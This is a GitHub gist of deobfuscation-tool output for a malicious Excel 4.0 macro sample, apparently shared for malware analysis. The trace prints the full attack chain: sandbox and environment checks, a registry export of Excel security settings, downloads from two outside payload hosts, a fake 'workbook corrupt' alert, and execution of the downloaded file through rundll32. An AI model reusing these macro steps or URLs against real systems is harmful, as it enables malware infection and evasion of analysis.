Created
May 23, 2020 17:39
-
-
Save JohnLaTwC/0f54ea5be52aacd19a2ef2d188a4e790 to your computer and use it in GitHub Desktop.
xlmdeobfuscator output 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > xlmdeobfuscator --file 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60 | |
| _ _______ | |
| |\ /|( \ ( ) | |
| ( \ / )| ( | () () | | |
| \ (_) / | | | || || | | |
| ) _ ( | | | |(_)| | | |
| / ( ) \ | | | | | | | |
| ( / \ )| (____/\| ) ( | | |
| |/ \|(_______/|/ \| | |
| ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______ | |
| ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ ) | |
| | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )| | |
| | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)| | |
| | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __) | |
| | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ ( | |
| | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__ | |
| (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/ | |
| XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator | |
| File: C:\temp\malware\cyc\797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60 | |
| [Loading Cells] | |
| auto_open: auto_openm6afs->'2vLFRsHXxIjyPtUuRJoWEsPvOjANfK'!$HU$50951 | |
| [Starting Deobfuscation] | |
| CELL:HU50951 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GA40879) | |
| CELL:HU50952 , FullEvaluation , GOTO(AL36930) | |
| CELL:AL36930 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GN25340) | |
| CELL:AL36931 , FullEvaluation , GOTO(GH16310) | |
| CELL:GH16310 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CT57368) | |
| CELL:GH16311 , FullEvaluation , GOTO(EB17524) | |
| CELL:EB17524 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DW61044) | |
| CELL:EB17525 , FullEvaluation , GOTO(DG45133) | |
| CELL:DG45133 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CV37983) | |
| CELL:DG45134 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!O26939) | |
| CELL:O26939 , FullEvaluation , FORMULA("=CLOSE(FALSE)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EW37000) | |
| CELL:O26940 , FullEvaluation , GOTO(CE63797) | |
| CELL:CE63797 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CE63798) | |
| CELL:CE63798 , NotImplemented , APP.MAXIMIZE() | |
| CELL:CE63799 , FullEvaluation , GOTO(BM18091) | |
| CELL:BM18091 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[18908]C[88]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BM18092) | |
| CELL:BM18092 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[18908]C[88]),) | |
| CELL:BM18093 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CQ50642) | |
| CELL:CQ50642 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-13643]C[58]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CQ50643) | |
| CELL:CQ50643 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-13643]C[58])) | |
| CELL:CQ50644 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EI11181) | |
| CELL:EI11181 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[25818]C[14]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EI11182) | |
| CELL:EI11182 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[25818]C[14]),) | |
| CELL:EI11183 , FullEvaluation , GOTO(L1180) | |
| CELL:L1180 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[35819]C[141]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!L1181) | |
| CELL:L1181 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[35819]C[141]),) | |
| CELL:L1182 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EU13046) | |
| CELL:EU13046 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[23953]C[2]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EU13047) | |
| CELL:EU13047 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[23953]C[2]),) | |
| CELL:EU13047 , FullEvaluation , [TRUE] GOTO(R[23953]C[2]) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:EU13047 , FullEvaluation , [FALSE] | |
| CELL:EU13048 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!R21769) | |
| CELL:R21769 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[15230]C[135]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!R21770) | |
| CELL:R21770 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[15230]C[135]),) | |
| CELL:R21770 , FullEvaluation , [TRUE] GOTO(R[15230]C[135]) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:R21770 , FullEvaluation , [FALSE] | |
| CELL:R21771 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DR14081) | |
| CELL:DR14081 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[22918]C[31]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DR14082) | |
| CELL:DR14082 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[22918]C[31])) | |
| CELL:DR14083 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AX32544) | |
| CELL:AX32544 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[4455]C[103]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AX32545) | |
| CELL:AX32545 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[4455]C[103])) | |
| CELL:AX32546 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!ID61803) | |
| CELL:ID61803 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-24804]C[-85]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!ID61804) | |
| CELL:ID61804 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-24804]C[-85])) | |
| CELL:ID61805 , FullEvaluation , GOTO(GN22239) | |
| CELL:GN22239 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CF64196) | |
| CELL:GN22240 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HR37672) | |
| CELL:HR37672 , FullEvaluation , FORMULA("=""C:\Users\Public\MRWk5IO.reg""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!L49932) | |
| CELL:HR37673 , FullEvaluation , GOTO(T8669) | |
| CELL:T8669 , FullEvaluation , FORMULA("=R[21768]C[-1]&GET.WORKSPACE(2)&""\Excel\Security ""&R[7504]C[-73]&"" /y""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CG42428) | |
| CELL:T8670 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HF38945) | |
| CELL:HF38945 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!I10296) | |
| CELL:HF38946 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EH17436) | |
| CELL:EH17436 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-7141]C[-129],R[24991]C[-53],0,5)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EH17437) | |
| CELL:EH17437 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",GET.WORKSPACE(2)\Excel\Security /y,0,5) | |
| CELL:EH17438 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD482) | |
| CELL:DD482 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[49447]C[-96])))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD485) | |
| CELL:DD483 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD486) | |
| CELL:DD484 , FullEvaluation , FORMULA("=NEXT()",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD487) | |
| CELL:DD485 , PartialEvaluation , WHILE("C:\Users\Public\MRWk5IO.reg") | |
| CELL:DD486 , PartialEvaluation , WAIT("NOW()+""00:00:01""") | |
| CELL:DD487 , PartialEvaluation , NEXT() | |
| CELL:DD488 , FullEvaluation , GOTO(V10277) | |
| CELL:V10277 , FullEvaluation , FORMULA("=FOPEN(R[39654]C[-10])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!V10278) | |
| CELL:V10278 , PartialEvaluation , FOPEN("C:\Users\Public\MRWk5IO.reg") | |
| CELL:V10279 , FullEvaluation , GOTO(IG12783) | |
| CELL:IG12783 , FullEvaluation , FORMULA("=FPOS(R[-2506]C[-219],215)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IG12784) | |
| CELL:IG12784 , PartialEvaluation , FPOS("C:\Users\Public\MRWk5IO.reg",215) | |
| CELL:IG12785 , FullEvaluation , GOTO(HI20632) | |
| CELL:HI20632 , FullEvaluation , FORMULA("=FREAD(R[-10355]C[-195],255)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HI20633) | |
| CELL:HI20633 , PartialEvaluation , FREAD("C:\Users\Public\MRWk5IO.reg",255) | |
| CELL:HI20634 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EK34461) | |
| CELL:EK34461 , FullEvaluation , FORMULA("=FCLOSE(R[-24184]C[-119])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EK34462) | |
| CELL:EK34462 , PartialEvaluation , FCLOSE("C:\Users\Public\MRWk5IO.reg") | |
| CELL:EK34463 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BA23558) | |
| CELL:BA23558 , FullEvaluation , FORMULA("=FILE.DELETE(R[26373]C[-41])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BA23559) | |
| CELL:BA23559 , NotImplemented , FILE.DELETE(R[26373]C[-41]) | |
| CELL:BA23560 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AK48096) | |
| CELL:AK48096 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-27464]C[180])),GOTO(R[-11097]C[116]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AK48097) | |
| CELL:AK48097 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-27464]C[180])),GOTO(R[-11097]C[116]),) | |
| CELL:AK48098 , FullEvaluation , GOTO(DX58006) | |
| CELL:DX58006 , FullEvaluation , FORMULA("=""C:\Users\Public\nBVi9h.html""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IN57112) | |
| CELL:DX58007 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AM7624) | |
| CELL:AM7624 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!M61772) | |
| CELL:AM7625 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HI19421) | |
| CELL:HI19421 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[42350]C[-204],R[37690]C[31],0,0)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HI19422) | |
| CELL:HI19422 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\nBVi9h.html",0,0) | |
| CELL:HI19423 , FullEvaluation , GOTO(AG7500) | |
| CELL:AG7500 , FullEvaluation , FORMULA("=FILES(R[49611]C[215])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AG7501) | |
| CELL:AG7501 , PartialEvaluation , FILES("C:\Users\Public\nBVi9h.html") | |
| CELL:AG7502 , FullEvaluation , GOTO(BU59145) | |
| CELL:BU59145 , FullEvaluation , FORMULA("=IF(ISERROR(R[-51645]C[-40]),GOTO(R[-22146]C[80]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BU59146) | |
| CELL:BU59146 , FullBranching , IF(ISERROR(R[-51645]C[-40]),GOTO(R[-22146]C[80]),) | |
| CELL:BU59146 , FullEvaluation , [TRUE] GOTO(R[-22146]C[80]) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:BU59146 , FullEvaluation , [FALSE] | |
| CELL:BU59147 , FullEvaluation , GOTO(CG59551) | |
| CELL:CG59551 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!FB9427) | |
| CELL:CG59552 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GM60336) | |
| CELL:GM60336 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GG59792) | |
| CELL:GM60337 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CJ30722) | |
| CELL:CJ30722 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GE27770) | |
| CELL:CJ30723 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AX54045) | |
| CELL:AX54045 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EJ8650) | |
| CELL:AX54046 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CP22668) | |
| CELL:CP22668 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CG45801) | |
| CELL:CP22669 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DA23632) | |
| CELL:DA23632 , FullEvaluation , FORMULA("=""C:\Users\Public\pLQQJvxb.html""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DK64014) | |
| CELL:DA23633 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!FC22672) | |
| CELL:FC22672 , FullEvaluation , FORMULA("=""http://9dani.com/wp-keys.php""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HA27745) | |
| CELL:FC22673 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HN18354) | |
| CELL:HN18354 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[13272]C[197],R[49541]C[103],0,0)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!L14473) | |
| CELL:HN18355 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CJ64159) | |
| CELL:CJ64159 , FullEvaluation , FORMULA("=FILES(R[28771]C[60])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BC35243) | |
| CELL:CJ64160 , FullEvaluation , GOTO(AL51508) | |
| CELL:AL51508 , FullEvaluation , FORMULA("=IF(ISERROR(R[34631]C[-79]),,RUN(R[45684]C[85]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!ED612) | |
| CELL:AL51509 , FullEvaluation , GOTO(BX11151) | |
| CELL:BX11151 , FullEvaluation , FORMULA("=""https://scsanwei.cn/wp-keys.php""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IF41817) | |
| CELL:BX11152 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BT27018) | |
| CELL:BT27018 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[40940]C[29],R[63137]C[-96],0,0)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HC877) | |
| CELL:BT27019 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AP4260) | |
| CELL:AP4260 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BW16243) | |
| CELL:AP4261 , FullEvaluation , GOTO(DZ51806) | |
| CELL:DZ51806 , FullEvaluation , FORMULA("=ALERT(R[-30053]C[-144])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HK46296) | |
| CELL:DZ51807 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EJ23437) | |
| CELL:EJ23437 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HY9631) | |
| CELL:EJ23438 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BO59864) | |
| CELL:BO59864 , FullEvaluation , FORMULA("=R[50536]C[25]&"",DllRegisterServer""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CL13478) | |
| CELL:BO59865 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IE5736) | |
| CELL:IE5736 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-52181]C[69],R[-48334]C[-74],0,5)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!FH61812) | |
| CELL:IE5737 , FullEvaluation , GOTO(L14473) | |
| CELL:L14473 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://9dani.com/wp-keys.php","C:\Users\Public\pLQQJvxb.html",0,0) | |
| CELL:L14474 , FullEvaluation , GOTO(BC35243) | |
| CELL:BC35243 , PartialEvaluation , FILES("C:\Users\Public\pLQQJvxb.html") | |
| CELL:BC35244 , FullEvaluation , GOTO(ED612) | |
| CELL:ED612 , FullBranching , IF(ISERROR(R[34631]C[-79]),,RUN(R[45684]C[85])) | |
| CELL:ED612 , FullEvaluation , [TRUE] | |
| CELL:ED613 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IF41817) | |
| CELL:IF41817 , FullEvaluation , "https://scsanwei.cn/wp-keys.php" | |
| CELL:IF41818 , FullEvaluation , GOTO(HC877) | |
| CELL:HC877 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://scsanwei.cn/wp-keys.php","C:\Users\Public\pLQQJvxb.html",0,0) | |
| CELL:HC878 , FullEvaluation , GOTO(BW16243) | |
| CELL:BW16243 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt." | |
| CELL:BW16244 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HK46296) | |
| CELL:HK46296 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.") | |
| CELL:HK46297 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HY9631) | |
| CELL:HY9631 , FullEvaluation , "C:\Windows\system32\rundll32.exe" | |
| CELL:HY9632 , FullEvaluation , GOTO(CL13478) | |
| CELL:CL13478 , FullEvaluation , C:\Users\Public\pLQQJvxb.html,DllRegisterServer | |
| CELL:CL13479 , FullEvaluation , GOTO(FH61812) | |
| CELL:FH61812 , FullEvaluation , a CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\pLQQJvxb.html,DllRegisterServer",0,5) | |
| CELL:FH61813 , FullEvaluation , GOTO(EW37000) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:ED612 , FullEvaluation , [FALSE] RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HK46296) | |
| CELL:HK46296 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.") | |
| CELL:HK46297 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HY9631) | |
| CELL:HY9631 , FullEvaluation , "C:\Windows\system32\rundll32.exe" | |
| CELL:HY9632 , FullEvaluation , GOTO(CL13478) | |
| CELL:CL13478 , FullEvaluation , C:\Users\Public\pLQQJvxb.html,DllRegisterServer | |
| CELL:CL13479 , FullEvaluation , GOTO(FH61812) | |
| CELL:FH61812 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\pLQQJvxb.html,DllRegisterServer",0,5) | |
| CELL:FH61813 , FullEvaluation , GOTO(EW37000) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| [END of Deobfuscation] | |
| time elapsed: 73.34104084968567 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment